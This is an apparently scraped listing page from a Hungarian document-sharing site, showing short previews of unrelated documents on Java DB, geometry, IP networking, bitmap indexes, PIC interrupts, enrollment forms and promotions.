CREATE TABLE student ( id int NOT NULL GENERATED ALWAYS AS IDENTITY PRIMARY KEY, name varchar(100) NOT NULL, address varchar(100) NOT NULL ) Célok: a Java DB adatbázis-kezelő rendszer használatának ismertetése, adatbázisok használata Java alkalmazásokban - kétrétegű architektúra, egyszerű kliens-szerver architektúra használata hálózati alkalmazásokhoz.

Részletesebben

Construction of a cube given with its centre and a sideline

Construction of a cube given with its centre and a sideline Transformation of a plane of projection Construction of a cube given with its centre and a sideline Exercise. Given the center O and a sideline e of a cube, where e is a vertical line. Construct the projections

Részletesebben

ENROLLMENT FORM / BEIRATKOZÁSI ADATLAP

ENROLLMENT FORM / BEIRATKOZÁSI ADATLAP ENROLLMENT FORM / BEIRATKOZÁSI ADATLAP CHILD S DATA / GYERMEK ADATAI PLEASE FILL IN THIS INFORMATION WITH DATA BASED ON OFFICIAL DOCUMENTS / KÉRJÜK, TÖLTSE KI A HIVATALOS DOKUMENTUMOKBAN SZEREPLŐ ADATOK

Részletesebben

Új funkciók az RBP-ben 2015. október 1-től New functions in RBP from 1 October 2015. Tatár Balázs

Új funkciók az RBP-ben 2015. október 1-től New functions in RBP from 1 October 2015. Tatár Balázs Új funkciók az RBP-ben 2015. október 1-től New functions in RBP from 1 October 2015 Tatár Balázs Üzletfejlesztés vezető / Business Development Manager Rendszerhasználói Tájékoztató Nap, 2015. szeptember

Részletesebben

TRENDnetVIEW Pro szoftvert. ŸGyors telepítési útmutató (1)

TRENDnetVIEW Pro szoftvert. ŸGyors telepítési útmutató (1) TRENDnetVIEW Pro szoftvert ŸGyors telepítési útmutató (1) TRENDnetVIEW Pro/05.29.2014 Tartalomjegyzék TRENDnetVIEW Pro Management Software követelmények... 13 TRENDnetVIEW Pro Telepítése... 14 Videokamerák

Részletesebben

INDEXSTRUKTÚRÁK III.

INDEXSTRUKTÚRÁK III. 2MU05_Bitmap.pdf camü_ea INDEXSTRUKTÚRÁK III. Molina-Ullman-Widom: Adatbázisrendszerek megvalósítása Panem, 2001könyv 5.4. Bittérkép indexek fejezete alapján Oracle: Indexek a gyakorlatban Oracle Database

Részletesebben

Cashback 2015 Deposit Promotion teljes szabályzat

Cashback 2015 Deposit Promotion teljes szabályzat Cashback 2015 Deposit Promotion teljes szabályzat 1. Definitions 1. Definíciók: a) Account Client s trading account or any other accounts and/or registers maintained for Számla Az ügyfél kereskedési számlája

Részletesebben

EMTP, EGY ÚJ LEVELEZÕ PROTOKOLL ÉS IMPLEMENTÁCIÓJA

EMTP, EGY ÚJ LEVELEZÕ PROTOKOLL ÉS IMPLEMENTÁCIÓJA EMTP, EGY ÚJ LEVELEZÕ PROTOKOLL ÉS IMPLEMENTÁCIÓJA Iványi Tibor, ivanyit@tigris.klte.hu Csukás Levente, csukasl@fox.klte.hu Kossuth Lajos Tudományegyetem Informatikai és Számító Központ Abstract The well

Részletesebben

Website review mozogjotthon.com

Website review mozogjotthon.com Website review mozogjotthon.com Generated on July 08 2015 10:32 AM The score is 30/100 SEO Content Title Mozogj otthon Length : 13 Perfect, your title contains between 10 and 70 characters. Description

Részletesebben

KELER KSZF Zrt. bankgarancia-befogadási kondíciói. Hatályos: 2014. július 8.

KELER KSZF Zrt. bankgarancia-befogadási kondíciói. Hatályos: 2014. július 8. KELER KSZF Zrt. bankgarancia-befogadási kondíciói Hatályos: 2014. július 8. A KELER KSZF a nem-pénzügyi klíringtagjaitól, és az energiapiaci alklíringtagjaitól a KELER KSZF Általános Üzletszabályzata szerinti

Részletesebben

Tavaszi Sporttábor / Spring Sports Camp. 2016. május 27 29. (péntek vasárnap) 27 29 May 2016 (Friday Sunday)

Tavaszi Sporttábor / Spring Sports Camp. 2016. május 27 29. (péntek vasárnap) 27 29 May 2016 (Friday Sunday) Tavaszi Sporttábor / Spring Sports Camp 2016. május 27 29. (péntek vasárnap) 27 29 May 2016 (Friday Sunday) SZÁLLÁS / ACCOMODDATION on a Hotel Gellért*** szálloda 2 ágyas szobáiban, vagy 2x2 ágyas hostel

Részletesebben

DANS és Narcis. Burmeister Erzsébet. HUNOR találkozó, Budapest 2013. március 13.

DANS és Narcis. Burmeister Erzsébet. HUNOR találkozó, Budapest 2013. március 13. DANS és Narcis Burmeister Erzsébet HUNOR találkozó, Budapest 2013. március 13. DANS DANS (Data Archiving and Network Services) http://www.dans.knaw.nl Kutatási adatok archiválása a saját fejlesztésű EASY

Részletesebben

Can/be able to. Using Can in Present, Past, and Future. A Can jelen, múlt és jövő idejű használata

Can/be able to. Using Can in Present, Past, and Future. A Can jelen, múlt és jövő idejű használata Can/ Can is one of the most commonly used modal verbs in English. It be used to express ability or opportunity, to request or offer permission, and to show possibility or impossibility. A az egyik leggyakrabban

Részletesebben

Miskolci Egyetem Gazdaságtudományi Kar Üzleti Információgazdálkodási és Módszertani Intézet Factor Analysis

Miskolci Egyetem Gazdaságtudományi Kar Üzleti Információgazdálkodási és Módszertani Intézet Factor Analysis Factor Analysis Factor analysis is a multiple statistical method, which analyzes the correlation relation between data, and it is for data reduction, dimension reduction and to explore the structure. Aim

Részletesebben

Source control systems. Horváth Ernő, Dr. Pozna Claudiu Radu

Source control systems. Horváth Ernő, Dr. Pozna Claudiu Radu Source control systems Horváth Ernő, Dr. Pozna Claudiu Radu Verziókezelés A verziókezelő rendszerek angolul revision control, version control, source control. Leggyakrabban a mérnöki tudományokban és a

Részletesebben

Rétegezett architektúra HTTP. A hálózatfejlesztés motorját a hálózati alkalmazások képezik. TCP/IP protokoll készlet

Rétegezett architektúra HTTP. A hálózatfejlesztés motorját a hálózati alkalmazások képezik. TCP/IP protokoll készlet HTTP Hálózat Rétegezett architektúra felhasználók Alkalmazási Web, e-mail, file transfer,... Szállítási Internet Hálózat-elérési Végponttól végpontig terjedő átvitel, Megbízható átvitel, sorrendbe állítás,

Részletesebben

Longman Exams Dictionary egynyelvű angol szótár nyelvvizsgára készülőknek

Longman Exams Dictionary egynyelvű angol szótár nyelvvizsgára készülőknek Longman Exams Dictionary egynyelvű angol szótár nyelvvizsgára készülőknek Egynyelvű angol nagyszótár haladó nyelvtanulóknak és nyelvvizsgázóknak 212,000 szócikkel A szótárban minden definíció egyszerű

Részletesebben

Számítógépes Hálózatok 2011

Számítógépes Hálózatok 2011 Számítógépes Hálózatok 2011 10. Hálózati réteg IP címzés, IPv6, ARP, DNS, Circuit Switching, Packet Switching 1 IPv4-Header (RFC 791) Version: 4 = IPv4 IHL: fejléc hossz 32 bites szavakban (>5) Type of

Részletesebben

16F628A megszakítás kezelése

16F628A megszakítás kezelése 16F628A megszakítás kezelése A 'megszakítás' azt jelenti, hogy a program normális, szekvenciális futása valamilyen külső hatás miatt átmenetileg felfüggesztődik, és a vezérlést egy külön rutin, a megszakításkezelő

Részletesebben

JEROMOS A BARATOM PDF

JEROMOS A BARATOM PDF JEROMOS A BARATOM PDF ==> Download: JEROMOS A BARATOM PDF JEROMOS A BARATOM PDF - Are you searching for Jeromos A Baratom Books? Now, you will be happy that at this time Jeromos A Baratom PDF is available

Részletesebben